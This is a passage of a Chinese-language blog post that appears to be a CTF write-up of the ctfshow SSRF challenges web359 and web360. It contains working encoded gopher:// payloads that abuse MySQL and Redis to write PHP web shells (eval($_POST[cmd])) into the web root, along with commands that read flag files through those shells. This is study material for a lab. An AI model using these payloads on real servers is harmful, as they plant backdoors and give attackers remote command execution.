class="variable">%256</span>f<span class="variable">%2573</span><span class="variable">%2505</span><span class="variable">%254</span><span class="keyword">c</span><span class="variable">%2569</span><span class="variable">%256</span>e<span class="variable">%2575</span><span class="variable">%2578</span><span class="variable">%250</span><span class="keyword">c</span><span class="variable">%255</span>f<span class="variable">%2563</span><span class="variable">%256</span><span class="keyword">c</span><span class="variable">%2569</span><span class="variable">%2565</span><span class="variable">%256</span>e<span class="variable">%2574</span><span class="variable">%255</span>f<span class="variable">%256</span>e<span class="variable">%2561</span><span class="variable">%256</span>d<span class="variable">%2565</span><span class="variable">%2508</span><span class="variable">%256</span><span class="keyword">c</span><span class="variable">%2569</span><span class="variable">%2562</span><span class="variable">%256</span>d<span class="variable">%2579</span><span class="variable">%2573</span><span class="variable">%2571</span><span class="variable">%256</span><span class="keyword">c</span><span class="variable">%2504</span><span class="variable">%255</span>f<span class="variable">%2570</span><span class="variable">%2569</span><span class="variable">%2564</span><span class="variable">%2505</span><span class="variable">%2532</span><span class="variable">%2537</span><span class="variable">%2532</span><span class="variable">%2535</span><span class="variable">%2535</span><span class="variable">%250</span>f<span class="variable">%255</span>f<span class="variable">%2563</span><span class="variable">%256</span><span class="keyword">c</span><span class="variable">%2569</span><span class="variable">%2565</span><span class="variable">%256</span>e<span class="variable">%2574</span><span class="variable">%255</span>f<span class="variable">%2576</span><span class="variable">%2565</span><span class="variable">%2572</span><span class="variable">%2573</span><span class="variable">%2569</span><span class="variable">%256</span>f<span class="variable">%256</span>e<span class="variable">%2506</span><span class="variable">%2535</span><span class="variable">%252</span>e<span class="variable">%2537</span><span class="variable">%252</span>e<span class="variable">%2532</span><span class="variable">%2532</span><span class="variable">%2509</span><span class="variable">%255</span>f<span class="variable">%2570</span><span class="variable">%256</span><span class="keyword">c</span><span class="variable">%2561</span><span class="variable">%2574</span><span class="variable">%2566</span><span class="variable">%256</span>f<span class="variable">%2572</span><span class="variable">%256</span>d<span class="variable">%2506</span><span class="variable">%2578</span><span class="variable">%2538</span><span class="variable">%2536</span><span class="variable">%255</span>f<span class="variable">%2536</span><span class="variable">%2534</span><span class="variable">%250</span><span class="keyword">c</span><span class="variable">%2570</span><span class="variable">%2572</span><span class="variable">%256</span>f<span class="variable">%2567</span><span class="variable">%2572</span><span class="variable">%2561</span><span class="variable">%256</span>d<span class="variable">%255</span>f<span class="variable">%256</span>e<span class="variable">%2561</span><span class="variable">%256</span>d<span class="variable">%2565</span><span class="variable">%2505</span><span class="variable">%256</span>d<span class="variable">%2579</span><span class="variable">%2573</span><span class="variable">%2571</span><span class="variable">%256</span><span class="keyword">c</span><span class="variable">%254</span><span class="keyword">c</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2503</span><span class="variable">%2520</span><span class="variable">%2573</span><span class="variable">%2565</span><span class="variable">%256</span><span class="keyword">c</span><span class="variable">%2565</span><span class="variable">%2563</span><span class="variable">%2574</span><span class="variable">%2520</span><span class="variable">%2522</span><span class="variable">%253</span><span class="keyword">c</span><span class="variable">%253</span>f<span class="variable">%2570</span><span class="variable">%2568</span><span class="variable">%2570</span><span class="variable">%2520</span><span class="variable">%2565</span><span class="variable">%2576</span><span class="variable">%2561</span><span class="variable">%256</span><span class="keyword">c</span><span class="variable">%2528</span><span class="variable">%2524</span><span class="variable">%255</span>f<span class="variable">%2550</span><span class="variable">%254</span>f<span class="variable">%2553</span><span class="variable">%2554</span><span class="variable">%255</span>b<span class="variable">%2563</span><span class="variable">%256</span>d<span class="variable">%2564</span><span class="variable">%255</span>d<span class="variable">%2529</span><span class="variable">%253</span>b<span class="variable">%2520</span><span class="variable">%253</span>f<span class="variable">%253</span>e<span class="variable">%2522</span><span class="variable">%2520</span><span class="variable">%2569</span><span class="variable">%256</span>e<span class="variable">%2574</span><span class="variable">%256</span>f<span class="variable">%2520</span><span class="variable">%256</span>f<span class="variable">%2575</span><span class="variable">%2574</span><span class="variable">%2566</span><span class="variable">%2569</span><span class="variable">%256</span><span class="keyword">c</span><span class="variable">%2565</span><span class="variable">%2520</span><span class="variable">%2522</span><span class="variable">%252</span>f<span class="variable">%2576</span><span class="variable">%2561</span><span class="variable">%2572</span><span class="variable">%252</span>f<span class="variable">%2577</span><span class="variable">%2577</span><span class="variable">%2577</span><span class="variable">%252</span>f<span class="variable">%2568</span><span class="variable">%2574</span><span class="variable">%256</span>d<span class="variable">%256</span><span class="keyword">c</span><span class="variable">%252</span>f<span class="variable">%2563</span><span class="variable">%256</span>d<span class="variable">%2564</span><span class="variable">%252</span>e<span class="variable">%2570</span><span class="variable">%2568</span><span class="variable">%2570</span><span class="variable">%2522</span><span class="variable">%253</span>b<span class="variable">%2501</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2501</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后访问cmd.php，post：cmd&#x3D;system(‘cat &#x2F;flag.txt’);</p>
<h1><span id="web360">web360</span></h1><p>利用gopher协议打redis也可以用Gopherus</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ python gopherus.py  --exploit redis</span><br><span class="line"></span><br><span class="line">What <span class="keyword">do</span> you want?? (ReverseShell/PHPShell): php</span><br><span class="line">Give web root location of server (default is /var/www/html):</span><br><span class="line">Give PHP Payload (We have default PHP Shell): &lt;?php <span class="built_in">eval</span>(<span class="variable">$_POST</span>[cmd]); ?&gt;</span><br><span class="line">Your gopher <span class="built_in">link</span> is Ready to get PHP Shell:</span><br><span class="line"></span><br><span class="line">gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bcmd%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A</span><br><span class="line"></span><br><span class="line">When it<span class="string">&#x27;s done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>payload要把它再进行一次URLEncode</p>
<div class="code-container" code-lang="Apache"><div class="codebox"><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">url</span>=gopher%<span class="number">3</span>A%<span class="number">2</span>F%<span class="number">2</span>F<span class="number">127.0.0.1</span>%<span class="number">3</span>A6379%<span class="number">2</span>F_%<span class="number">252</span>A1%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">25248</span>%<span class="number">250</span>D%<span class="number">250</span>Aflushall%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">252</span>A3%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">25243</span>%<span class="number">250</span>D%<span class="number">250</span>Aset%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">25241</span>%<span class="number">250</span>D%<span class="number">250</span>A1%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">252431</span>%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">250</span>A%<span class="number">250</span>A%<span class="number">253</span>C%<span class="number">253</span>Fphp%<span class="number">2520</span>eval%<span class="number">2528</span>%<span class="number">2524</span>_POST%<span class="number">255</span>Bcmd%<span class="number">255</span>D%<span class="number">2529</span>%<span class="number">253</span>B%<span class="number">2520</span>%<span class="number">253</span>F%<span class="number">253</span>E%<span class="number">250</span>A%<span class="number">250</span>A%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">252</span>A4%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">25246</span>%<span class="number">250</span>D%<span class="number">250</span>Aconfig%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">25243</span>%<span class="number">250</span>D%<span class="number">250</span>Aset%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">25243</span>%<span class="number">250</span>D%<span class="number">250</span>Adir%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">252413</span>%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">2</span>Fvar%<span class="number">2</span>Fwww%<span class="number">2</span>Fhtml%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">252</span>A4%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">25246</span>%<span class="number">250</span>D%<span class="number">250</span>Aconfig%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">25243</span>%<span class="number">250</span>D%<span class="number">250</span>Aset%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">252410</span>%<span class="number">250</span>D%<span class="number">250</span>Adbfilename%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">25249</span>%<span class="number">250</span>D%<span class="number">250</span>Ashell.php%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">252</span>A1%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">25244</span>%<span class="number">250</span>D%<span class="number">250</span>Asave%<span class="number">250</span>D%<span class="number">250</span>A%<span class="number">250</span>A</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>再访问<code>/shell.php</code>执行命令即可</p>
<div class="code-container" code-lang="Abnf"><div class="codebox"><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">cmd</span><span class="operator">=</span>system(<span class="string">&quot;cat /flaaag&quot;</span>)<span class="comment">;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<hr>
<p>学习链接：</p>
<p><a target="_blank" rel="noopener" href="https://www.ucloud.cn/yun/121452.html">CTFshow刷题日记-WEB-SSRF（web351-360）SSRF总结 - UCloud云社区</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/Xxy605/article/details/114988116">(11条消息) CTFshow_Web_SSRF——web351~web360（除354、357）_Ho1aAs的博客-CSDN博客</a></p>
</div><div class="post-reward"><div class="post-reward-btn" title="赞赏作者"><img src="/assets/images/svg/uc/uc-gift.svg" class="icon noview" alt="Icon"><span></span></div><div class="post-reward-content"><div class="post-reward-text"></div><div class="post-reward-list"><a href="/null" target="_blank">致谢名单</a></div></div></div><div class="post-copyright"><div class="post-copyright-info">本作品由 jjjing 于 2022-08-09 21:10:33 发布</div><div class="post-copyright-link"><span>作品地址：<a href="https://jinggg1123.github.io/archives/2022/08/09/ctfshowssrf/">ctfshow_web入门_ssrf</a></span><button class="copy-text" type="button" data-text="https://jinggg1123.github.io/archives/2022/08/09/ctfshowssrf/">复制</button></div><div class="post-copyright-detail">除特别声明外，本站作品均采用 <a href='https://creativecommons.org/licenses/by-nc-sa/4.0/' title='Attribution-NonCommercial-ShareAlike' target='_blank'>CC BY-NC-SA 4.0</a> 许可协议，转载请注明来自 <a href='/'>jjjing</a></div><img class="post-copyright-icon noview" src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></div><div class="post-tail-tags"></div><div class="post-nav"><a class="post-nav-prev" href="/2022/08/27/vulntaget-a/" title="vulntarget-a打靶记录">上一篇<span>vulntarget-a打靶记录</span></a><a class="post-nav-next" href="/2022/08/09/ctfshow%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="ctfshow_web入门_文件包含">下一篇<span>ctfshow_web入门_文件包含</span></a></div></div><aside id="post-sidebar" status="show" active=""><div id="toc-container"><div class="toc-title"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"><span>目录</span></div><div class="toc-content" id="toc-div"><ol class="toc-list"><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">SSRF基础</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">web351</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">web352、353</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">web354</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">web355</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">web356</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">web357</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">web358</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">web359</span></a></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">web360</span></a></li></ol></div></div><script>document.addEventListener('DOMContentLoaded', function () {
  var headings = Array.from(document.querySelectorAll('.post h1, .post h2, .post h3, .post h4, .post h5, .post h6'));
  var usedHeadings = [];

  document.querySelectorAll('#toc-container .toc-list-link').forEach(function (link) {
    var title = link.querySelector('.toc-list-text').textContent.trim();
    var item = link.closest('.toc-list-item');
    var level = (item.className.match(/toc-list-level-(\d)/) || [])[1];
    var heading = headings.find(function (node) {
      return usedHeadings.indexOf(node) === -1 &&
        (!level || node.tagName === 'H' + level) &&
        node.textContent.trim() === title;
    });
    if (!heading) return;

    var target = heading.id ? heading : heading.querySelector('[id]');
    if (!target) return;
    usedHeadings.push(heading);
    link.setAttribute('href', '#' + encodeURIComponent(target.id));
    link.setAttribute('data-toc-target', target.id);
  });

  document.addEventListener('click', function (event) {
    var link = event.target.closest('#toc-container .toc-list-link[data-toc-target]');
    if (!link) return;

    var heading = document.getElementById(link.getAttribute('data-toc-target'));
    if (!heading) return;

    event.preventDefault();
    event.stopPropagation();
    window.history.pushState(null, '', link.getAttribute('href'));
    heading.scrollIntoView({ behavior: 'smooth', block: 'start' });
  }, true);
});</script></aside></div></div><div id="toolbar" hide=""><div id="toolbar-setting-container" hide=""><div class="toolbar-item"><button id="tool-color-mode" title="深色模式" type="button"><img src="/assets/images/svg/ta/ta-moon.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button class="copy-text" id="tool-share" title="分享" type="button" data-text="https://jinggg1123.github.io/archives/2022/08/09/ctfshowssrf/"><img src="/assets/images/svg/ta/ta-share.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-plus" title="放大字体" type="button"><img src="/assets/images/svg/ta/ta-text-plus.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-minus" title="缩小字体" type="button"><img src="/assets/images/svg/ta/ta-text-minus.svg" class="icon noview" alt="Icon"></button></div></div><div class="toolbar-container"><div class="toolbar-item"><button id="tool-setting" title="设置" type="button"><img src="/assets/images/svg/ta/ta-setting.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-toc" title="目录" type="button" aria-controls="post-sidebar" aria-expanded="true"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-gototop" title="返回顶部" type="button"><img src="/assets/images/svg/ta/ta-up.svg" class="icon noview" alt="Icon"></button></div></div></div><div id="music-player"></div></main><footer><div class="footer"><div id="footer-copyright">© 2021 - 2026 <span>💗</span> <a href="/null">jjjing</a></div><div id="footer-info"><div id="footer-framework">🚀本站由 <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/chanwj/hexo-theme-meow" title="3.3.2" target="_blank">Meow</a> 强力驱动</div><div id="footer-runtime"><span id="runtime" data-startdate="2021-11-23T22:16:20.000Z">🌻已稳定运行.年.月.天</span></div></div></div></footer><div class="scripts"><script>const GLOBALCONFIG = {
  root: '/',
  toolbar: true,
  lazyload_src: '/assets/images/Meow-Loading.webp',
  friends: false,
  album: '',
  codeblock: true,
  code_copy_text: true,
  share_text: '🐱Share From Meow',
  onblur_title: 'Please Come Back～✧(´▽`ʃ♡ƪ)',
  mouse_click: false,
  notify:{
    enable: false,
    info: '复制成功～转载请标注本文地址',
    f12_info: '开发者模式已打开，请遵循本站版权协议'
  },
  search: {
    enable: false,
    path: '',
    local: {
      top_n_per_article: 1,
      preload: false
    }
  },
  encrypt: false,
  category: false,
};
</script><script>if (!localStorage.getItem('color-mode')) {
  localStorage.setItem('color-mode', 'light' || 'light');
}
document.body.setAttribute('data-mode', localStorage.getItem('color-mode'));
</script>
<script src="/js/theme/tools/utils.js"></script>

<script src="/js/plugins/dist/lazyload.min.js"></script>

<script src="/js/plugins/view-image.min.js"></script>
<script>if (localStorage.getItem('font-size')) {
  document.querySelector('.post').style.fontSize = localStorage.getItem('font-size') + 'px';
}
</script>
<script src="/js/plugins/dist/APlayer.min.js"></script>
<script>const initAplayer = (data) => {
  if (!data.length) return;

  const ap = new APlayer({
    container: document.getElementById('music-player'),
    fixed: true,
    autoplay: false,
    theme: '#FFB347',
    loop: 'all',
    order: 'list',
    volume: 0.7,
    lrcType: 3,
    audio: data
  });

  ap.on('play', () => {
    document.getElementById('music-player').setAttribute("play", "");
  });
  ap.on('pause', () => {
    document.getElementById('music-player').removeAttribute("play");
  });
};

const fetchData = () => {
  fetch('')
    .then(res => res.json())
    .then(result => initAplayer(result));
};

if ('') {
  document.addEventListener("DOMContentLoaded", fetchData);
} else {
  document.addEventListener("DOMContentLoaded", initAplayer());;
}</script>
<script src="/js/main.js" type="module"></script>
</div></body></html>